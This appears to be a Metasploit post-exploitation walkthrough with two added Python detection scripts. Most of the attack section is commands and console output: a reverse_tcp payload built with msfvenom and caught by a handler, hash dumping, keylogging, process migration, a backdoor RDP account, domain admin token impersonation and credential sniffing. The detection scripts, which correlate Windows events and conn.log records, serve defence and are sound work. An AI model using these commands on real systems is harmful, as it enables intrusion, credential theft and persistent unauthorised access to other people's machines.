sessions -i 1 //open the first established session
getuid //show the current UID
sysinfo //show system information of the attacked host
run hashdump //dump the target host's account hashes; keep a copy to brute-force
ps //list the target host's processes
migrate 1576(pid) //migrate into the administrator's process; 1576 is the administrator's process ID
getuid
keyscan_start //start keystroke logging
keyscan_dump //show the captured keystrokes
keyscan_stop //stop keystroke logging
run getgui -e //remotely enable Remote Desktop on the target host
run getgui -u cisco -p cisco //remotely add an account and password on the target host
rdesktop 192.168.1.100 //connect over Remote Desktop
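The `getgui -e` / `getgui -u` pair above leaves a distinctive footprint in the Windows Security log on the victim: a local account is created, it is added to privileged local groups, and Remote Desktop is switched on by a registry change, all within seconds and under the same logon session. The following correlation script is an added defender-side example, not code from the original post or from Metasploit. It assumes the standard event IDs 4720 (user account created), 4732 (member added to a security-enabled local group) and 4657 (registry value modified, which only fires if object-access auditing is enabled on the Terminal Server key), that `getgui` writes `fDenyTSConnections = 0` under `HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server`, and that the member's account name has already been resolved from its SID; the event records themselves are constructed for this example.

```python
"""Correlate Windows Security events that together look like a backdoor RDP
account being provisioned: local account created, account added to
Administrators / Remote Desktop Users, and fDenyTSConnections set to 0.
All sample events below are constructed; field names are flattened from the
EventData of the real events and the member name is assumed resolved from
its SID."""
from collections import defaultdict
from datetime import datetime, timedelta

ACCOUNT_CREATED = 4720            # A user account was created
LOCAL_GROUP_MEMBER_ADDED = 4732   # A member was added to a security-enabled local group
REGISTRY_VALUE_MODIFIED = 4657    # A registry value was modified (needs object auditing)
RDP_KEY = r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
PRIV_GROUPS = {"Administrators", "Remote Desktop Users"}
WINDOW = timedelta(minutes=5)     # how long after the 4720 we look for follow-ups

SAMPLE_EVENTS = [
    # constructed: what "run getgui -u cisco -p cisco" followed by "run getgui -e" would produce
    {"time": "2016-01-20T02:25:10", "EventID": 4720, "SubjectUserName": "Administrator",
     "SubjectLogonId": "0x1a2b3", "TargetUserName": "cisco"},
    {"time": "2016-01-20T02:25:11", "EventID": 4732, "SubjectUserName": "Administrator",
     "SubjectLogonId": "0x1a2b3", "TargetUserName": "Administrators",
     "MemberName": "XINDONG-58E843E\\cisco"},
    {"time": "2016-01-20T02:25:11", "EventID": 4732, "SubjectUserName": "Administrator",
     "SubjectLogonId": "0x1a2b3", "TargetUserName": "Remote Desktop Users",
     "MemberName": "XINDONG-58E843E\\cisco"},
    {"time": "2016-01-20T02:25:12", "EventID": 4657, "SubjectUserName": "Administrator",
     "SubjectLogonId": "0x1a2b3", "ObjectName": RDP_KEY,
     "ObjectValueName": "fDenyTSConnections", "OldValue": "1", "NewValue": "0"},
    # constructed benign noise: helpdesk creates a plain user hours later
    {"time": "2016-01-20T09:00:00", "EventID": 4720, "SubjectUserName": "helpdesk",
     "SubjectLogonId": "0x9f8e7", "TargetUserName": "jsmith"},
    {"time": "2016-01-20T09:00:05", "EventID": 4732, "SubjectUserName": "helpdesk",
     "SubjectLogonId": "0x9f8e7", "TargetUserName": "Users",
     "MemberName": "XINDONG-58E843E\\jsmith"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _member_is(event, user):
    # MemberName is DOMAIN\user; compare only the account part, case-insensitively
    return event.get("MemberName", "").split("\\")[-1].lower() == user.lower()


def correlate(events, window=WINDOW):
    """Return one alert per account creation that is followed, within `window`
    and in the same logon session, by a privileged-group grant and/or RDP enable."""
    by_logon = defaultdict(list)
    for e in events:
        by_logon[e["SubjectLogonId"]].append(e)

    alerts = []
    for logon_id, evs in by_logon.items():
        evs.sort(key=_ts)
        for created in (e for e in evs if e["EventID"] == ACCOUNT_CREATED):
            t0, user = _ts(created), created["TargetUserName"]
            related = [e for e in evs if t0 <= _ts(e) <= t0 + window]
            groups = {e["TargetUserName"] for e in related
                      if e["EventID"] == LOCAL_GROUP_MEMBER_ADDED
                      and e["TargetUserName"] in PRIV_GROUPS
                      and _member_is(e, user)}
            rdp_enabled = any(e["EventID"] == REGISTRY_VALUE_MODIFIED
                              and e.get("ObjectName", "").lower() == RDP_KEY.lower()
                              and e.get("ObjectValueName") == "fDenyTSConnections"
                              and e.get("NewValue") == "0"
                              for e in related)
            if groups or rdp_enabled:
                alerts.append({"logon_id": logon_id, "created_by": created["SubjectUserName"],
                               "user": user, "groups": groups, "rdp_enabled": rdp_enabled})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"[!] {a['created_by']} created '{a['user']}', groups={sorted(a['groups'])}, "
              f"rdp_enabled={a['rdp_enabled']} (logon {a['logon_id']})")
```

Keying the correlation on `SubjectLogonId` rather than on the username matters here: after `migrate` the attacker's actions are attributed to the legitimate Administrator, so the username alone looks normal, but the sequence inside one logon session does not.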
Hands-on:
The Metasploit host's IP is 192.168.1.3
➜ ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f exe >b.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
➜ ~ ls
Desktop Documents Downloads Library Movies Music Pictures Public VirtualBox VMs b.exe
➜ ~
msf > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
Started reverse TCP handler on 192.168.1.3:4444
Starting the payload handler...
Sending stage (957487 bytes) to 192.168.1.11
Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.11:1027) at 2016-01-20 02:24:05 +0800
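On the wire, the session above is a single TCP connection from the victim (192.168.1.11:1027) to the handler (192.168.1.3:4444) in which the victim sends almost nothing and the handler immediately pushes a 957487-byte stage over a port with no recognisable protocol. The script below is an added network-side example, not from the original post or from any Metasploit component. It parses a few constructed Zeek-style `conn.log` records (tab-separated, `-` for an unset field, a simplified column set) and flags connections that match that staging shape; the byte thresholds and the treatment of 4444 as a default handler port are heuristics chosen for this example, not documented Zeek or Metasploit behaviour.

```python
"""Flag Zeek-style conn.log records that look like a staged reverse_tcp
payload download: tiny request from the internal host, large unidentified
response from the remote side, and/or a well-known default handler port.
The log lines and thresholds below are constructed for this example."""

# simplified conn.log column order used by the constructed records
CONN_FIELDS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
               "proto", "service", "duration", "orig_bytes", "resp_bytes"]

SAMPLE_CONN_LOG = """\
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes
1453227845.0\tC1\t192.168.1.11\t1027\t192.168.1.3\t4444\ttcp\t-\t3.1\t120\t957487
1453227900.0\tC2\t192.168.1.11\t1040\t93.184.216.34\t443\ttcp\tssl\t12.0\t2048\t814000
1453227950.0\tC3\t192.168.1.11\t1055\t192.168.1.20\t445\ttcp\tsmb\t0.4\t512\t900
1453228000.0\tC4\t192.168.1.11\t1060\t192.168.1.3\t8080\ttcp\t-\t1.5\t0\t60"""

DEFAULT_HANDLER_PORTS = {4444}   # msfvenom/multi-handler default LPORT, as on the page
MIN_STAGE_BYTES = 500_000        # heuristic: Meterpreter stages are several hundred KB
MAX_REQUEST_BYTES = 2_000        # heuristic: the victim sends almost nothing first


def parse_conn_log(text):
    """Parse tab-separated conn.log text into dicts, skipping comment lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(CONN_FIELDS, line.split("\t")))
        for key in ("id.orig_p", "id.resp_p", "orig_bytes", "resp_bytes"):
            rec[key] = int(rec[key])
        rec["duration"] = float(rec["duration"])
        records.append(rec)
    return records


def classify(rec):
    """Return the list of reasons a record looks like payload staging (empty if none)."""
    reasons = []
    if rec["id.resp_p"] in DEFAULT_HANDLER_PORTS:
        reasons.append("default handler port")
    if (rec["service"] == "-"                      # Zeek could not identify a protocol
            and rec["resp_bytes"] >= MIN_STAGE_BYTES
            and rec["orig_bytes"] <= MAX_REQUEST_BYTES):
        reasons.append("large unidentified download after tiny request")
    return reasons


def find_staging(text):
    """Return (uid, reasons) for every suspicious connection in the log text."""
    hits = []
    for rec in parse_conn_log(text):
        reasons = classify(rec)
        if reasons:
            hits.append((rec["uid"], reasons))
    return hits


if __name__ == "__main__":
    for uid, reasons in find_staging(SAMPLE_CONN_LOG):
        print(f"[!] {uid}: {'; '.join(reasons)}")
```

The port check alone is weak (an operator can pick any LPORT), which is why the second rule keys on shape instead: an unidentified protocol, a near-empty request and a response the size of a stage. The TLS download to port 443 in the sample is deliberately left alone because Zeek labels it `ssl`.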
To get a cmd prompt, just type shell
meterpreter > shell
Process 1600 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\>
Domain controller privilege escalation:
meterpreter > use incognito
Loading extension incognito...success.
use incognito loads the module; once it succeeds,
list_tokens -u lists the domain admin tokens
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
XINDONG-58E843E\Administrator
Impersonation Tokens Available
========================================
No tokens available
impersonate_token your-domain-admin, for example: impersonate_token XINDONG-58E843E\Administrator
Then run shell
and you have domain admin privileges.
The above only illustrates the method: no domain controller was set up here, but where one exists the steps above apply.
Sniffing:
First exit the shell
meterpreter > exit
Shutting down Meterpreter...
192.168.1.11 - Meterpreter session 1 closed. Reason: User exit
After exiting, select the sniffer module
and run it
msf exploit(handler) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
Auxiliary module execution completed
msf auxiliary(psnuffle) >
Loaded protocol FTP from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/ftp.rb...
Loaded protocol IMAP from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/imap.rb...
Loaded protocol POP3 from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/pop3.rb...
Loaded protocol SMB from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/smb.rb...
Loaded protocol URL from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/url.rb...
Sniffing traffic.....